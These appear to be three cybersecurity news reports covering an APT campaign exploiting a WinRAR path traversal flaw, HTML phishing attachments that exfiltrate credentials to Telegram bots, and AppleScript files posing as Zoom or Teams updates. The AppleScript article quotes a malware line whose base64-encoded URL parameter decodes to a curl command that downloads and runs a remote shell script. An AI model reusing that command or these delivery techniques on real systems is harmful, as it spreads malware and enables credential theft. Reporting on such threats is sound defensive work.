The advanced persistent threat group APT-C-08, also known as Manlinghua or BITTER, has launched a sophisticated campaign targeting government organizations across South Asia by exploiting a critical directory traversal vulnerability in WinRAR.

Security researchers have identified the group’s first operational use of CVE-2025-6218, a flaw affecting WinRAR versions 7.11 and earlier that allows attackers to breach file system boundaries and execute malicious code on compromised systems.

APT-C-08 maintains established relationships with South Asian governments and has historically focused on stealing sensitive information from government agencies, the military-industrial complex, overseas institutions, and universities.

The threat group has demonstrated proficiency in weaponizing malicious documents as attack entry points, meticulously crafting socially engineered payloads designed to bypass security awareness.

This latest campaign represents a significant escalation, leveraging a vulnerability that remains difficult to patch due to WinRAR’s inconsistent update mechanisms across enterprise environments.

Security analysts and researchers identified the malware campaign by discovering weaponized RAR archives containing deceptively named files, such as “Provision of Information for Sectoral for AJK.rar.”

The malicious archive exploits CVE-2025-6218 by leveraging specially crafted file paths that contain spaces after directory traversal sequences, a technique that circumvents WinRAR’s path normalization.

When victims extract the archive, the exploit deposits a malicious Normal. dotm macro file into the Windows template directory at C:\Users[username]\AppData\Roaming\Microsoft\Templates, establishing persistence through Microsoft Word’s automatic template loading mechanism.

Infection Mechanism and Code Execution

The attack chain demonstrates a sophisticated understanding of Windows system architecture.

Upon extraction, the malicious Normal.dotm file (MD5: 4bedd8e2b66cc7d64b293493ef5b8942) runs when the victim opens any Word document, triggering VBA macros that execute the “net use” command to map remote directories to the local machine.

Subsequently, the macro launches winnsc.exe from the remote server, establishing command execution capabilities.

This two-stage infection approach ensures that opening the initial document triggers the infection without raising suspicion, allowing operators to maintain stealth while establishing persistent remote access.

The exploit’s low difficulty, combined with its high success rate, has prompted security communities to recommend immediate patching of all WinRAR installations and implementing application allowlisting to restrict macro execution in Microsoft Office templates.

Organizations handling sensitive government information should prioritize threat detection monitoring for suspicious network mapping activities and macro-based indicators of compromise.

Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.

The post APT-C-08 Hackers Exploiting WinRAR Vulnerability to Attack Government Organizations appeared first on Cyber Security News.

A sophisticated phishing campaign has emerged, targeting organizations across Central and Eastern Europe by impersonating legitimate global brands to deceive users into surrendering their login credentials.

The attack utilizes self-contained HTML files delivered as email attachments, eliminating the need for external server hosting or suspicious URLs that traditional security systems typically detect.

Once opened, these attachments present convincing fake login pages for brands including Microsoft 365, Adobe, WeTransfer, FedEx, and DHL, creating a seamless user experience designed to bypass conventional email security controls.

The attack methodology demonstrates a clear understanding of regional business practices.

Threat actors distribute phishing emails posing as legitimate customers or business partners, requesting quotations or invoice confirmations through RFC-compliant filenames such as RFQ_4460-INQUIRY.HTML.

This targeted approach focuses on industries with regular procurement workflows, including agriculture, automotive, construction, and education sectors, primarily in the Czech Republic, Slovakia, Hungary, and Germany.

Cyble security analysts identified that the campaign’s success relies on embedded JavaScript within HTML attachments that captures credentials and transmits them directly to attacker-controlled Telegram bots rather than traditional command-and-control servers.

Upon execution, victims encounter a carefully replicated login interface displaying brand-authentic branding with blurred background images for added legitimacy.

Campaign Overview

The credential capture mechanism functions by reading form field values and constructing API requests to send stolen data directly through the Telegram Bot API.

Technical analysis reveals two distinct implementation approaches among analyzed samples. The first variant implements CryptoJS AES encryption for obfuscation while capturing email addresses, passwords, IP addresses, and user-agent information before redirecting victims to legitimate company domains.

The second sample employs more advanced anti-forensics techniques, blocking keyboard combinations including F12, Ctrl+U/S/C/A/X, and right-click context menus to prevent code inspection and analysis.

The exfiltration function demonstrates technical sophistication by utilizing the native Fetch API for cleaner code implementation rather than jQuery dependencies.

The JavaScript constructs POST requests containing harvested credentials sent via HTTPS to api.telegram.org/bot endpoints with hardcoded bot tokens and chat IDs embedded directly in the payload.

This approach deliberately avoids suspicious network patterns while maintaining operational resilience through decentralized bot infrastructure.

Organizations should prioritize deploying HTML attachment controls and implementing content inspection policies to block or sandbox potentially malicious HTML files before delivery to end users.

Security teams are advised to hunt for api.telegram.org POST activity originating from client systems and conduct retroactive threat hunts for identified indicators to assess whether credentials have been compromised.

Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.

The post New Phishing Attack Leverages Popular Brands to Harvest Login Credentials appeared first on Cyber Security News.

Threat actors continue to evolve their techniques for bypassing macOS security controls, shifting away from traditional attack vectors that Apple has systematically patched.

Following Apple’s removal of the “right-click and open” Gatekeeper override in August 2024, attackers have identified and weaponized a new delivery mechanism using compiled AppleScript files with deceptive naming conventions.

These .scpt files are increasingly being leveraged to distribute malware that masquerades as legitimate software updates, including fake Zoom and Microsoft Teams installers.

The emerging threat centers on .scpt files that open directly in Script Editor.app by default, creating an attractive attack surface for threat actors.

When users double-click these files, the application displays a user-friendly interface with social engineering prompts encouraging execution.

The malware operators strategically embed malicious code after extensive blank lines to hide the actual payload from casual inspection.

By simply clicking the “Run” button or pressing Cmd+R, users inadvertently execute the script even if it has been flagged by Gatekeeper quarantine protections, effectively circumventing Apple’s security mechanisms.

Security analysts at Moonlock Labs and Pepe Berba identified this technique gaining prominence in recent months, discovering sophisticated campaigns that previously appeared in advanced persistent threat operations.

Pepe Berba noted that while AppleScript files themselves are not new, the proliferation of samples using this technique represents a concerning trend, particularly as commodity malware families like MacSync Stealer and Odyssey Stealer have adopted the methodology.

This represents a classic case of advanced techniques trickling down from state-sponsored actors to common cybercriminal operations.

Technical structure

The technical structure of these scripts employs several clever deception tactics.

A sample analyzed reveals AppleScript code such as set teamsSDKURL to "https://learn.microsoft.com/en-us/microsoftteams/platform/?v=Y3VybCAtc0wgYXVici5pby94LnNoIHwgc2ggLXY=" followed by do shell script "open -g " & quoted form of teamsSDKURL.

This command structure opens malicious URLs in the background while presenting legitimate-looking update prompts to the user.

The filenames themselves serve as the primary deception layer, with variants including “MSTeamsUpdate.scpt,” “Zoom SDK Update.scpt,” and “Microsoft.TeamsSDK.scpt.”

The persistence and detection evasion capabilities of these attacks deserve particular attention.

Many .scpt files currently maintain zero detections on VirusTotal, providing attackers with significant operational runway before security vendors implement detection signatures.

The files often arrive through phishing emails or compromised websites offering software updates, targeting users seeking legitimate version upgrades.

This attack vector presents a significant challenge for macOS security, as it exploits user trust in familiar application names while leveraging native system tools that legitimate users regularly interact with.

Organizations must educate users about verifying software updates through official channels and implement endpoint detection solutions capable of monitoring AppleScript execution patterns.

Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.

The post Hackers Weaponize AppleScript to Creatively Deliver macOS Malware Mimic as Zoom/Teams Updates appeared first on Cyber Security News.